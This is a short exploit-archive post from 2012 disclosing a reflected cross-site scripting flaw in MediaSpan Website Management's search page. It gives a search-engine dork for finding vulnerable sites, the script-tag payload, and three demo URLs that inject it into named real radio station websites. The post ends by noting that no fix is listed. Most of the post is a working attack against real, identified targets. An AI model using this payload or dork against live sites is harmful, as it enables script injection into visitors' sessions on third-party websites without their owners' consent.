MediaSpan Website Management Cross Site Scipting

2012-07-04 08:23:22
Inviato da: Crim3R

# Exploit Title: MediaSpan Website Management Cross Site Scipting

# Google Dork: intext: Copyright © 2012 CUMULUS MEDIA and MediaSpan

# Date: 7/03/2012

# Author: Crim3R

# software Link : http://www.mediaspanonline.com/products/websitemanagement/

# Version: All :)

# Tested on: all



========================================
there is an xss in searchresults.asp
go to search page and put this (or any html code) in search form
<script>alert(1);</script>

========================================

Demo sites:

http://khop.com/searchresults.asp?search=1&LOOKFOR=&searchFor=<script>alert(1);</script>++&keyword=<script>alert(1);</script>++


http://www.993kjoy.com/searchresults.asp?search=1&LOOKFOR=&searchFor=<script>alert(1);</script>++&keyword=<script>alert(1);</script>++


http://www.wabcradio.com/searchresults.asp?search=1&LOOKFOR=&searchFor=<script>alert(1);</script>++&keyword=<script>alert(1);</script>++


===============Crim3R=====================

sites :

http://irist.ir/forum/
http://security7.ir/sc/


thanks to : Amir - 2MzRp - Skote_vahshat-

and all IrIsT security7 Members ...

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.